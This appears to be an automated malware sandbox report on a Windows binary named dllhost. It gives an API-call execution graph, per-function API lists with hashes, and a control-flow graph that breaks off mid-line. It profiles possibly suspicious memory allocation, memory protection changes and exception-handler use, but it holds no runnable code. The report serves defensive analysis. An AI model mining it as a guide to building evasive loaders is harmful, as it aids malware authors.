                                                                                  • Opcode ID: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction ID: ebe0215c953d00e54fa583c8f1e870bcfd19df2d92563f2361f67c6791dd81a8
                                                                                  • Opcode Fuzzy Hash: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction Fuzzy Hash: CAB012BDF002045BBE101F734B0CB0935AF6F8237335482D46883D9000CF24C014CD20

                                                                                  Execution Graph

                                                                                  Execution Coverage:9.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:3.1%
                                                                                  Total number of Nodes:671
                                                                                  Total number of Limit Nodes:14
                                                                                  execution_graph 2847 401000 GetVersion 2878 403b48 HeapCreate 2847->2878 2849 40105e 2850 401063 2849->2850 2851 40106b 2849->2851 2979 404890 2850->2979 2890 403fb8 2851->2890 2855 401070 2856 401074 2855->2856 2857 40107c 2855->2857 2858 404890 8 API calls 2856->2858 2900 403bd8 2857->2900 2860 40107b 2858->2860 2860->2857 2861 401086 GetCommandLineA 2914 4021dc 2861->2914 2865 4010a0 2946 40419c 2865->2946 2867 4010a5 2868 4010aa GetStartupInfoA 2867->2868 2959 404570 2868->2959 2870 4010bc GetModuleHandleA 2963 4061e4 HeapCreate 2870->2963 2879 403b68 2878->2879 2880 403b9e 2878->2880 2993 4023bc 2879->2993 2880->2849 2883 403b84 2886 403ba1 2883->2886 3007 402a90 2883->3007 2884 403b77 3005 403470 HeapAlloc 2884->3005 2886->2849 2887 403b81 2887->2886 2889 403b92 HeapDestroy 2887->2889 2889->2880 3245 40400c InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 2890->3245 2892 403fbe TlsAlloc 2893 404008 2892->2893 2894 403fce 2892->2894 2893->2855 2895 401878 30 API calls 2894->2895 2896 403fd7 2895->2896 2896->2893 2897 403fdf TlsSetValue 2896->2897 2897->2893 2898 403ff0 2897->2898 2899 403ff6 GetCurrentThreadId 2898->2899 2899->2855 2901 4049d8 29 API calls 2900->2901 2902 403beb 2901->2902 2903 403bf9 GetStartupInfoA 2902->2903 2904 403528 7 API calls 2902->2904 2911 403c47 2903->2911 2912 403d18 2903->2912 2904->2903 2906 403d43 GetStdHandle 2908 403d51 GetFileType 2906->2908 2906->2912 2907 403d83 SetHandleCount 2907->2861 2908->2912 2909 403cbe 2909->2912 2913 403ce0 GetFileType 2909->2913 2910 4049d8 29 API calls 2910->2911 2911->2909 2911->2910 2911->2912 2912->2906 2912->2907 2913->2909 2915 4021f7 GetEnvironmentStringsW 2914->2915 2916 40222a 2914->2916 2917 40220b GetEnvironmentStrings 2915->2917 2918 4021ff 2915->2918 2916->2918 2919 40221b 2916->2919 2917->2919 2920 401096 2917->2920 2921 402243 WideCharToMultiByte 2918->2921 2922 402237 GetEnvironmentStringsW 2918->2922 2919->2920 2923 4022c9 2919->2923 2924 4022bd GetEnvironmentStrings 2919->2924 2937 404100 2920->2937 2926 402277 2921->2926 2927 4022a9 FreeEnvironmentStringsW 2921->2927 2922->2920 2922->2921 2928 4049d8 29 API calls 2923->2928 2924->2920 2924->2923 2929 4049d8 29 API calls 2926->2929 2927->2920 2935 4022e4 2928->2935 2930 40227d 2929->2930 2930->2927 2931 402286 WideCharToMultiByte 2930->2931 2933 4022a0 2931->2933 2934 402297 2931->2934 2932 4022fa FreeEnvironmentStringsA 2932->2920 2933->2927 2936 4015ac 29 API calls 2934->2936 2935->2932 2936->2933 2938 404112 2937->2938 2939 404117 GetModuleFileNameA 2937->2939 3246 402504 2938->3246 2941 40413a 2939->2941 2942 4049d8 29 API calls 2941->2942 2943 40415b 2942->2943 2944 40416b 2943->2944 2945 403528 7 API calls 2943->2945 2944->2865 2945->2944 2947 4041a9 2946->2947 2949 4041ae 2946->2949 2948 402504 48 API calls 2947->2948 2948->2949 2950 4049d8 29 API calls 2949->2950 2951 4041db 2950->2951 2952 403528 7 API calls 2951->2952 2955 4041ef 2951->2955 2952->2955 2953 4015ac 29 API calls 2954 40423e 2953->2954 2954->2867 2956 4049d8 29 API calls 2955->2956 2957 404232 2955->2957 2958 403528 7 API calls 2955->2958 2956->2955 2957->2953 2958->2955 2960 404579 2959->2960 2962 40457e 2959->2962 2961 402504 48 API calls 2960->2961 2961->2962 2962->2870 2964 406211 HeapAlloc 2963->2964 2965 4010e0 2963->2965 2966 406591 HeapDestroy 2964->2966 2967 406235 HeapAlloc 2964->2967 2985 40487c 2965->2985 2966->2965 2967->2966 2968 406265 6 API calls 2967->2968 2969 40657a 2968->2969 2970 40633e 2968->2970 2969->2966 2971 406580 KiUserCallbackDispatcher 2969->2971 3275 4089e4 CreateIoCompletionPort 2970->3275 2971->2966 2973 406562 3278 408be4 2973->3278 2975 40634f 2975->2973 2978 4063ae 2975->2978 2978->2975 3281 405fe4 GetTickCount 2978->3281 3283 407ae4 2978->3283 2980 404899 2979->2980 2981 40489e 2979->2981 2982 401edc 7 API calls 2980->2982 2983 401f48 7 API calls 2981->2983 2982->2981 2984 4048a7 ExitProcess 2983->2984 3294 4047d4 2985->3294 2988 40209c 2989 403ae0 35 API calls 2988->2989 2991 4020a7 2989->2991 2990 4021cd UnhandledExceptionFilter 2992 4010fa 2990->2992 2991->2990 2991->2992 3016 401df4 2993->3016 2995 4023c9 GetVersionExA 2996 4023e5 2995->2996 2997 4023ff GetEnvironmentVariableA 2995->2997 2996->2997 2999 4023f7 2996->2999 2998 4024dc 2997->2998 3001 40241e 2997->3001 2998->2999 3021 401f18 GetModuleHandleA 2998->3021 2999->2883 2999->2884 3002 402463 GetModuleFileNameA 3001->3002 3003 40245b 3001->3003 3002->3003 3003->2998 3018 4051e4 3003->3018 3006 40348c 3005->3006 3006->2887 3008 402aa4 HeapAlloc 3007->3008 3009 402a9d 3007->3009 3010 402ac1 VirtualAlloc 3008->3010 3015 402af9 3008->3015 3009->3010 3011 402ae1 VirtualAlloc 3010->3011 3012 402bb6 3010->3012 3013 402ba8 VirtualFree 3011->3013 3011->3015 3014 402bbe HeapFree 3012->3014 3012->3015 3013->3012 3014->3015 3015->2887 3017 401e00 3016->3017 3017->2995 3017->3017 3023 4051fc 3018->3023 3022 401f2f 3021->3022 3022->2999 3025 405214 3023->3025 3027 405244 3025->3027 3032 403d94 3025->3032 3026 403d94 6 API calls 3026->3027 3027->3026 3030 40536d 3027->3030 3031 4051f7 3027->3031 3036 405404 3027->3036 3030->3031 3047 403788 3030->3047 3031->2998 3033 403da6 3032->3033 3034 403db2 3032->3034 3033->3025 3050 401460 3034->3050 3037 405422 InterlockedIncrement 3036->3037 3039 40540f 3036->3039 3038 40543e InterlockedDecrement 3037->3038 3042 405448 3037->3042 3062 403e20 3038->3062 3039->3027 3077 404408 3042->3077 3044 405468 InterlockedDecrement 3044->3039 3045 40545e 3083 4044d4 LeaveCriticalSection 3045->3083 3217 403ae0 GetLastError TlsGetValue 3047->3217 3049 40378d 3049->3031 3051 401491 GetStringTypeW 3050->3051 3052 4014a9 3050->3052 3051->3052 3053 4014ad GetStringTypeA 3051->3053 3054 4014d4 GetStringTypeA 3052->3054 3055 4014f8 3052->3055 3053->3052 3056 401595 3053->3056 3054->3056 3055->3056 3058 40150e MultiByteToWideChar 3055->3058 3056->3033 3058->3056 3059 401532 3058->3059 3059->3056 3060 40156c MultiByteToWideChar 3059->3060 3060->3056 3061 401585 GetStringTypeW 3060->3061 3061->3056 3063 403e76 EnterCriticalSection 3062->3063 3064 403e38 3062->3064 3063->3042 3084 4049d8 3064->3084 3067 403e4e 3069 403e20 27 API calls 3067->3069 3070 403e56 3069->3070 3071 403e67 3070->3071 3072 403e5d InitializeCriticalSection 3070->3072 3093 4015ac 3071->3093 3073 403e6c 3072->3073 3110 4044d4 LeaveCriticalSection 3073->3110 3076 403e74 3076->3063 3078 404433 3077->3078 3081 404416 3077->3081 3079 40444f 3078->3079 3080 403d94 6 API calls 3078->3080 3079->3081 3199 40123c 3079->3199 3080->3079 3081->3044 3081->3045 3083->3039 3111 404038 3084->3111 3087 403528 3088 403531 3087->3088 3089 403536 3087->3089 3152 401edc 3088->3152 3158 401f48 3089->3158 3094 401686 3093->3094 3095 4015da 3093->3095 3094->3073 3096 4015e4 3095->3096 3097 40161f 3095->3097 3098 403e20 28 API calls 3096->3098 3100 403e20 28 API calls 3097->3100 3109 401610 3097->3109 3102 4015eb 3098->3102 3099 401678 HeapFree 3099->3094 3104 40162b 3100->3104 3101 401605 3178 401616 3101->3178 3102->3101 3172 403144 3102->3172 3103 401657 3185 40166e 3103->3185 3104->3103 3181 402a48 3104->3181 3109->3094 3109->3099 3110->3076 3112 403e40 3111->3112 3113 40403f 3111->3113 3112->3067 3112->3087 3113->3112 3115 401cf8 3113->3115 3116 401d25 3115->3116 3120 401d68 3115->3120 3117 403e20 28 API calls 3116->3117 3121 401d53 3116->3121 3118 401d3b 3117->3118 3133 402c5c 3118->3133 3119 401dd7 RtlAllocateHeap 3124 401d5a 3119->3124 3120->3121 3122 401d8a 3120->3122 3121->3119 3121->3124 3125 403e20 28 API calls 3122->3125 3124->3113 3127 401d91 3125->3127 3142 402600 3127->3142 3130 401da4 3149 401dbe 3130->3149 3137 402c8e 3133->3137 3134 402d2d 3135 402f68 VirtualAlloc 3134->3135 3136 401d46 3134->3136 3135->3136 3139 401d5f 3136->3139 3137->3134 3137->3136 3138 403064 HeapReAlloc HeapAlloc VirtualAlloc HeapFree 3137->3138 3138->3134 3140 4044d4 LeaveCriticalSection 3139->3140 3141 401d66 3140->3141 3141->3121 3143 40260e 3142->3143 3144 4026fa VirtualAlloc 3143->3144 3145 4027cf 3143->3145 3148 4026cb 3143->3148 3144->3148 3147 402a90 HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 3145->3147 3147->3148 3148->3130 3150 4044d4 LeaveCriticalSection 3149->3150 3151 401db1 3150->3151 3151->3121 3151->3124 3153 401ee6 3152->3153 3154 401f13 3153->3154 3155 401f48 7 API calls 3153->3155 3154->3089 3156 401efd 3155->3156 3157 401f48 7 API calls 3156->3157 3157->3154 3161 401f5b 3158->3161 3159 40206c 3159->3067 3160 402072 3164 402085 GetStdHandle WriteFile 3160->3164 3161->3159 3161->3160 3162 401f9b 3161->3162 3162->3159 3163 401fa7 GetModuleFileNameA 3162->3163 3165 401fbf 3163->3165 3164->3159 3167 402310 3165->3167 3168 40231d LoadLibraryA 3167->3168 3171 40235f 3167->3171 3169 40232e GetProcAddress 3168->3169 3168->3171 3170 402345 GetProcAddress GetProcAddress 3169->3170 3169->3171 3170->3171 3171->3159 3173 403182 3172->3173 3177 403438 3172->3177 3174 40337e VirtualFree 3173->3174 3173->3177 3175 4033e2 3174->3175 3176 4033f1 VirtualFree HeapFree 3175->3176 3175->3177 3176->3177 3177->3101 3188 4044d4 LeaveCriticalSection 3178->3188 3180 40161d 3180->3109 3182 402a75 3181->3182 3183 402a8b 3181->3183 3182->3183 3189 40292c 3182->3189 3183->3103 3198 4044d4 LeaveCriticalSection 3185->3198 3187 401675 3187->3109 3188->3180 3192 402939 3189->3192 3190 4029e9 3190->3183 3191 40295a VirtualFree 3191->3192 3192->3190 3192->3191 3194 402bd4 VirtualFree 3192->3194 3195 402bf1 3194->3195 3196 402c21 3195->3196 3197 402c01 HeapFree 3195->3197 3196->3192 3197->3192 3198->3187 3200 401288 3199->3200 3201 40126c LCMapStringW 3199->3201 3204 4012d1 LCMapStringA 3200->3204 3205 4012ee 3200->3205 3201->3200 3202 401290 LCMapStringA 3201->3202 3202->3200 3203 4013ca 3202->3203 3203->3081 3204->3203 3205->3203 3206 401304 MultiByteToWideChar 3205->3206 3206->3203 3207 40132e 3206->3207 3207->3203 3208 401364 MultiByteToWideChar 3207->3208 3208->3203 3209 40137d LCMapStringW 3208->3209 3209->3203 3210 401398 3209->3210 3211 40139e 3210->3211 3213 4013de 3210->3213 3211->3203 3212 4013ac LCMapStringW 3211->3212 3212->3203 3213->3203 3214 401416 LCMapStringW 3213->3214 3214->3203 3215 40142e WideCharToMultiByte 3214->3215 3215->3203 3218 403b3b SetLastError 3217->3218 3219 403afc 3217->3219 3218->3049 3228 401878 3219->3228 3222 403b33 3224 403528 7 API calls 3222->3224 3223 403b0d TlsSetValue 3223->3222 3225 403b1e 3223->3225 3226 403b3a 3224->3226 3227 403b24 GetCurrentThreadId 3225->3227 3226->3218 3227->3218 3236 4018ad 3228->3236 3229 401993 3229->3222 3229->3223 3230 401965 HeapAlloc 3230->3236 3231 403e20 29 API calls 3231->3236 3232 402c5c 5 API calls 3232->3236 3233 402600 6 API calls 3233->3236 3236->3229 3236->3230 3236->3231 3236->3232 3236->3233 3237 401911 3236->3237 3240 40199a 3236->3240 3243 4044d4 LeaveCriticalSection 3237->3243 3239 401918 3239->3236 3244 4044d4 LeaveCriticalSection 3240->3244 3242 4019a1 3242->3236 3243->3239 3244->3242 3245->2892 3247 40250d 3246->3247 3248 402514 3246->3248 3250 404258 3247->3250 3248->2939 3251 403e20 29 API calls 3250->3251 3252 404268 3251->3252 3261 40498c 3252->3261 3255 40427f 3274 4044d4 LeaveCriticalSection 3255->3274 3257 4043fd 3257->3248 3259 4042a4 GetCPInfo 3260 4042ba 3259->3260 3260->3255 3266 404db0 GetCPInfo 3260->3266 3262 4049ac 3261->3262 3263 40499c GetOEMCP 3261->3263 3264 404270 3262->3264 3265 4049b1 GetACP 3262->3265 3263->3262 3264->3255 3264->3259 3264->3260 3265->3264 3267 404dd3 3266->3267 3273 404e9b 3266->3273 3268 401460 6 API calls 3267->3268 3269 404e4f 3268->3269 3270 40123c 9 API calls 3269->3270 3271 404e73 3270->3271 3272 40123c 9 API calls 3271->3272 3272->3273 3273->3255 3274->3257 3276 405fe4 GetTickCount 3275->3276 3277 408a02 3276->3277 3277->2975 3279 408bf7 3278->3279 3280 408bec CloseHandle 3278->3280 3279->2969 3280->3279 3282 405ff3 3281->3282 3282->2978 3284 407af0 3283->3284 3285 407af7 GetQueuedCompletionStatus 3283->3285 3290 406ee4 3284->3290 3287 407b14 3285->3287 3288 407b38 GetLastError 3285->3288 3287->2978 3288->2978 3291 406ef1 3290->3291 3293 406f04 3290->3293 3291->3291 3292 405fe4 GetTickCount 3291->3292 3291->3293 3292->3293 3293->3285 3303 403f38 3294->3303 3297 4047e5 GetCurrentProcess TerminateProcess 3298 4047f6 3297->3298 3299 404860 3298->3299 3300 404867 ExitProcess 3298->3300 3306 404564 3299->3306 3304 403e20 29 API calls 3303->3304 3305 403f3f 3304->3305 3305->3297 3305->3298 3309 4044d4 LeaveCriticalSection 3306->3309 3308 4010e9 3308->2988 3309->3308 3379 401e60 3380 401e6f 3379->3380 3382 401e92 3380->3382 3383 401e24 IsBadCodePtr 3380->3383 3384 401e36 3383->3384 3384->3382 3385 402520 3386 40252d 3385->3386 3387 401878 30 API calls 3386->3387 3388 402547 3387->3388 3389 401878 30 API calls 3388->3389 3391 402572 3388->3391 3390 402560 3389->3390 3390->3391 3392 403528 7 API calls 3390->3392 3392->3391 3319 407be4 3330 4049ec 3319->3330 3322 407dc8 3323 407c9e GetWindowRect MonitorFromWindow GetMonitorInfoW 3325 407d26 SetWindowPos ShowWindow LoadAcceleratorsW 3323->3325 3326 407db8 KiUserCallbackDispatcher 3325->3326 3326->3322 3327 407d89 3326->3327 3328 407d8d TranslateAcceleratorW 3327->3328 3329 407d9e TranslateMessage DispatchMessageW 3327->3329 3328->3329 3329->3326 3331 4049f8 6 API calls 3330->3331 3331->3322 3331->3323 3332 405ae4 3333 405b35 GetWindowLongW 3332->3333 3334 405af9 SetWindowLongW CreateCompatibleDC SetTimer LoadStringW 3332->3334 3335 405c4f DefWindowProcW 3333->3335 3336 405b4a 3333->3336 3334->3335 3345 405ba0 3335->3345 3337 405c43 DeleteObject 3336->3337 3338 405b55 3336->3338 3337->3335 3339 405be6 IsIconic 3338->3339 3340 405b5e 3338->3340 3339->3335 3341 405bf1 GetWindowRect OffsetRect CreateRoundRectRgn SetWindowRgn DeleteObject 3339->3341 3342 405b63 3340->3342 3343 405bb4 BeginPaint BitBlt EndPaint 3340->3343 3341->3335 3344 405ba8 PostQuitMessage 3342->3344 3346 405b66 3342->3346 3343->3335 3344->3335 3346->3335 3346->3345 3347 405b76 KillTimer AnimateWindow PostMessageW 3346->3347 3347->3335 3348 401404 3349 401412 3348->3349 3350 401416 LCMapStringW 3349->3350 3351 4013ca 3349->3351 3350->3351 3352 40142e WideCharToMultiByte 3350->3352 3352->3351 3393 407ee4 3394 407ef8 3393->3394 3396 407f06 3393->3396 3395 407f35 IsBadReadPtr 3394->3395 3394->3396 3395->3396 3397 406ae4 GetPEB 3398 406b23 3397->3398 3399 404064 3400 403e20 29 API calls 3399->3400 3401 40406f 3400->3401 3402 4040c4 3401->3402 3408 403f14 3401->3408 3413 403888 3401->3413 3423 404540 3401->3423 3428 4044d4 LeaveCriticalSection 3402->3428 3405 4040cb 3409 403f28 EnterCriticalSection 3408->3409 3410 403f1d 3408->3410 3409->3401 3411 403e20 29 API calls 3410->3411 3412 403f26 3411->3412 3412->3401 3414 403897 3413->3414 3421 4038b4 3413->3421 3429 403988 3414->3429 3420 4038ad 3420->3421 3422 4015ac 29 API calls 3420->3422 3421->3401 3422->3421 3424 404554 LeaveCriticalSection 3423->3424 3425 404549 3423->3425 3424->3401 3560 4044d4 LeaveCriticalSection 3425->3560 3427 404552 3427->3401 3428->3405 3430 40399e 3429->3430 3432 40389d 3429->3432 3430->3432 3451 4045c8 3430->3451 3433 403a70 3432->3433 3434 4038a5 3433->3434 3435 403a7c 3433->3435 3437 40359c 3434->3437 3435->3434 3436 4015ac 29 API calls 3435->3436 3436->3434 3438 4035e1 3437->3438 3439 4035a9 3437->3439 3440 403788 35 API calls 3438->3440 3439->3438 3441 4035c4 3439->3441 3442 4035e6 3440->3442 3443 403e84 31 API calls 3441->3443 3444 40239c 35 API calls 3442->3444 3445 4035cb 3443->3445 3446 4035f1 3444->3446 3535 4035fc 3445->3535 3446->3420 3450 4035d9 3450->3420 3452 404615 3451->3452 3453 4045d5 3451->3453 3454 403788 35 API calls 3452->3454 3453->3452 3455 4045f0 3453->3455 3456 40461a 3454->3456 3465 403e84 3455->3465 3497 40239c 3456->3497 3459 4045f7 3474 404630 3459->3474 3464 40460d 3464->3432 3466 403ed2 EnterCriticalSection 3465->3466 3467 403eaf 3465->3467 3466->3459 3468 403e20 29 API calls 3467->3468 3469 403eb6 3468->3469 3470 403eca 3469->3470 3471 403ebd InitializeCriticalSection 3469->3471 3500 4044d4 LeaveCriticalSection 3470->3500 3471->3470 3473 403ed1 3473->3466 3475 404650 3474->3475 3493 404605 3474->3493 3476 40467d 3475->3476 3501 403f44 3475->3501 3478 40474f WriteFile 3476->3478 3483 40468e 3476->3483 3480 404771 GetLastError 3478->3480 3481 404716 3478->3481 3479 40478a 3482 403788 35 API calls 3479->3482 3479->3493 3480->3481 3481->3479 3486 404728 3481->3486 3481->3493 3487 4047a4 3482->3487 3483->3479 3483->3481 3484 4046da WriteFile 3483->3484 3484->3483 3485 404744 GetLastError 3484->3485 3485->3481 3488 404730 3486->3488 3489 40477c 3486->3489 3490 40239c 35 API calls 3487->3490 3492 403788 35 API calls 3488->3492 3511 403714 3489->3511 3490->3493 3494 404735 3492->3494 3496 4044ec LeaveCriticalSection 3493->3496 3495 40239c 35 API calls 3494->3495 3495->3493 3496->3464 3498 403ae0 35 API calls 3497->3498 3499 4023a1 3498->3499 3499->3432 3500->3473 3528 403a9c 3501->3528 3503 403f50 3504 403f63 SetFilePointer 3503->3504 3505 403f56 3503->3505 3507 403f7b GetLastError 3504->3507 3508 403f83 3504->3508 3506 403788 35 API calls 3505->3506 3509 403f5b 3506->3509 3507->3508 3508->3509 3510 403714 35 API calls 3508->3510 3509->3476 3510->3509 3512 40239c 35 API calls 3511->3512 3513 40371a 3512->3513 3514 40374d 3513->3514 3515 403736 3513->3515 3516 403788 35 API calls 3514->3516 3517 40375d 3515->3517 3519 403740 3515->3519 3518 403752 3516->3518 3520 40377a 3517->3520 3522 40376d 3517->3522 3518->3493 3521 403788 35 API calls 3519->3521 3523 403788 35 API calls 3520->3523 3525 403745 3521->3525 3526 403788 35 API calls 3522->3526 3524 40377f 3523->3524 3524->3493 3525->3493 3527 403772 3526->3527 3527->3493 3529 403aa8 3528->3529 3530 403ac4 3529->3530 3531 403788 35 API calls 3529->3531 3530->3503 3532 403acc 3531->3532 3533 40239c 35 API calls 3532->3533 3534 403ad7 3533->3534 3534->3503 3536 403a9c 35 API calls 3535->3536 3538 403608 3536->3538 3537 40364a 3551 4039f0 3537->3551 3538->3537 3540 403628 3538->3540 3541 403a9c 35 API calls 3538->3541 3540->3537 3544 403a9c 35 API calls 3540->3544 3543 40361f 3541->3543 3546 403a9c 35 API calls 3543->3546 3547 403634 CloseHandle 3544->3547 3545 4035d1 3550 4044ec LeaveCriticalSection 3545->3550 3546->3540 3547->3537 3549 403640 GetLastError 3547->3549 3548 403714 35 API calls 3548->3545 3549->3537 3550->3450 3552 403a56 3551->3552 3553 4039fe 3551->3553 3554 403788 35 API calls 3552->3554 3553->3552 3558 403a24 3553->3558 3555 403a5b 3554->3555 3557 40239c 35 API calls 3555->3557 3556 403652 3556->3545 3556->3548 3557->3556 3558->3556 3559 403a46 SetStdHandle 3558->3559 3559->3556 3560->3427 3561 4083e4 3562 4083f3 TlsGetValue 3561->3562 3563 408403 3561->3563 3562->3563 3564 4088e4 3565 408907 3564->3565 3566 4088f9 3564->3566 3566->3565 3567 40895e VirtualAlloc 3566->3567 3567->3565 3568 408973 3567->3568 3568->3565 3569 40899e VirtualProtect 3568->3569 3569->3565 3354 4025c8 GetSystemTimeAsFileTime 3355 4025e6 3354->3355 3570 4023a8 3582 4039e4 3570->3582 3573 4023bb 3574 403e20 29 API calls 3581 4038df 3574->3581 3575 403947 3593 4044d4 LeaveCriticalSection 3575->3593 3577 40394f 3579 403915 DeleteCriticalSection 3580 4015ac 29 API calls 3579->3580 3580->3581 3581->3575 3581->3579 3585 4048b4 3581->3585 3594 4048e8 3582->3594 3586 4048c3 3585->3586 3587 4048c9 3585->3587 3586->3581 3604 403ee4 3587->3604 3589 4048cf 3590 403888 47 API calls 3589->3590 3591 4048d5 3590->3591 3610 404510 3591->3610 3593->3577 3595 403e20 29 API calls 3594->3595 3602 4048f6 3595->3602 3596 404975 3603 4044d4 LeaveCriticalSection 3596->3603 3598 4023ad 3598->3573 3598->3574 3599 403f14 30 API calls 3599->3602 3600 404540 2 API calls 3600->3602 3601 403958 46 API calls 3601->3602 3602->3596 3602->3599 3602->3600 3602->3601 3603->3598 3605 403ef1 3604->3605 3606 403f08 EnterCriticalSection 3604->3606 3605->3606 3607 403ef8 3605->3607 3606->3589 3608 403e20 29 API calls 3607->3608 3609 403f06 3608->3609 3609->3589 3611 404534 LeaveCriticalSection 3610->3611 3612 40451d 3610->3612 3611->3586 3612->3611 3613 404524 3612->3613 3616 4044d4 LeaveCriticalSection 3613->3616 3615 404532 3615->3586 3616->3615 3617 402c2c 3618 4049d8 29 API calls 3617->3618 3619 402c36 3618->3619 3620 402c47 3619->3620 3621 403528 7 API calls 3619->3621 3621->3620 3357 401350 3358 40135f 3357->3358 3359 401364 MultiByteToWideChar 3358->3359 3360 4013ca 3358->3360 3359->3360 3361 40137d LCMapStringW 3359->3361 3361->3360 3362 401398 3361->3362 3363 40139e 3362->3363 3365 4013de 3362->3365 3363->3360 3364 4013ac LCMapStringW 3363->3364 3364->3360 3365->3360 3366 401416 LCMapStringW 3365->3366 3366->3360 3367 40142e WideCharToMultiByte 3366->3367 3367->3360 3310 4047d4 3311 403f38 29 API calls 3310->3311 3312 4047da 3311->3312 3313 4047e5 GetCurrentProcess TerminateProcess 3312->3313 3314 4047f6 3312->3314 3313->3314 3315 404860 3314->3315 3316 404867 ExitProcess 3314->3316 3317 404564 LeaveCriticalSection 3315->3317 3318 404865 3317->3318 3369 4011d8 3370 403ae0 35 API calls 3369->3370 3371 401207 3370->3371 3372 403ae0 35 API calls 3371->3372 3373 401218 3371->3373 3372->3373 3622 4034b8 3623 4034c9 3622->3623 3626 4034d1 3622->3626 3624 4034ce CloseHandle 3623->3624 3623->3626 3624->3626 3625 4034e3 3626->3625 3627 4034e0 CloseHandle 3626->3627 3627->3625 3628 4047bc 3629 401f48 7 API calls 3628->3629 3630 4047c3 3629->3630 3635 404c00 3630->3635 3636 404c14 3635->3636 3642 404c22 3635->3642 3637 404c5e 3636->3637 3636->3642 3638 403ae0 35 API calls 3637->3638 3640 404c63 3638->3640 3639 403e20 29 API calls 3639->3640 3641 404c9d 3640->3641 3643 404cb3 3640->3643 3648 4047ca 3641->3648 3654 4044d4 LeaveCriticalSection 3641->3654 3642->3639 3642->3648 3645 404cc5 3643->3645 3649 404ccd 3643->3649 3655 4044d4 LeaveCriticalSection 3643->3655 3647 403874 32 API calls 3645->3647 3647->3649 3651 403874 3648->3651 3649->3648 3656 4044d4 LeaveCriticalSection 3649->3656 3652 4047d4 32 API calls 3651->3652 3653 403881 3652->3653 3654->3648 3655->3645 3656->3648 3374 40155d 3375 401564 3374->3375 3376 401595 3375->3376 3377 40156c MultiByteToWideChar 3375->3377 3377->3376 3378 401585 GetStringTypeW 3377->3378 3378->3376 3657 4010fd 3658 401108 3657->3658 3659 403874 32 API calls 3657->3659 3659->3658 3660 401e3d SetUnhandledExceptionFilter

                                                                                  Executed Functions

                                                                                  Function 00405AE4 Relevance: 30.1, APIs: 20, Instructions: 136timewindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00405B02
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00405B0B
                                                                                  • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 00405B1D
                                                                                  • LoadStringW.USER32(00000081,00000001,00000000,00000000), ref: 00405B2A
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00405B38
                                                                                  • KillTimer.USER32(?,00000001), ref: 00405B79
                                                                                  • AnimateWindow.USER32(?,00000BB8,00090000), ref: 00405B8A
                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00405B95
                                                                                  • DefWindowProcW.USER32(?,00000081,?,?), ref: 00405C59
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$LongTimer$AnimateCompatibleCreateKillLoadMessagePostProcString
                                                                                  • String ID:
                                                                                  • API String ID: 2522358032-0
                                                                                  • Opcode ID: 3030fe5b0f7969995eb32f426db33af26adcdaaaba1d73ac6509f2ca98b2a990
                                                                                  • Instruction ID: d2e356219e18b708c0172940fafb97bba7094412dfd2a6634aeebdafb9ad043e
                                                                                  • Opcode Fuzzy Hash: 3030fe5b0f7969995eb32f426db33af26adcdaaaba1d73ac6509f2ca98b2a990
                                                                                  • Instruction Fuzzy Hash: E5418C72604606BBEB215FA1DE8CEAB7B7CFB89701F004425F653B91A2C7749900DF28
                                                                                  Function 004061E4 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 301memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 35 4061e4-40620b HeapCreate 36 406211-40622f HeapAlloc 35->36 37 40659a-40659e 35->37 38 406591-406594 HeapDestroy 36->38 39 406235-40625f HeapAlloc 36->39 38->37 39->38 40 406265-406338 HeapAlloc TlsAlloc TlsSetValue RtlAddVectoredExceptionHandler RtlRemoveVectoredExceptionHandler TlsFree 39->40 41 40657a-40657e 40->41 42 40633e-406386 call 4089e4 call 4065e4 call 406de4 call 4082e4 40->42 41->38 43 406580-40658e KiUserCallbackDispatcher 41->43 52 406572-406575 call 408be4 42->52 53 40638c-406394 call 4082e4 42->53 43->38 52->41 57 406397-40639b 53->57 58 4063a1-4063a8 57->58 59 406562-406569 57->59 58->59 61 4063ae-4063c7 call 405fe4 call 4068e4 58->61 59->52 60 40656b-40656e 59->60 60->52 66 4063c9 61->66 67 4063cb-4063e0 61->67 68 406436-40643d 66->68 69 4063e4-4063e8 67->69 70 406443-406474 68->70 71 406507-40650e 68->71 69->68 72 4063ea-4063f9 69->72 73 406490-406499 70->73 74 406476-40647a 70->74 75 406510-406517 71->75 76 406542 71->76 77 406406 72->77 78 4063fb-406404 72->78 83 406502 73->83 84 40649b-4064a4 73->84 80 406481-40648e call 4067e4 74->80 81 40647c 74->81 75->76 82 406519-406520 75->82 85 406546-40655d call 407ae4 call 4082e4 76->85 79 40640a-40641d 77->79 78->79 88 406421-406431 call 4066e4 79->88 89 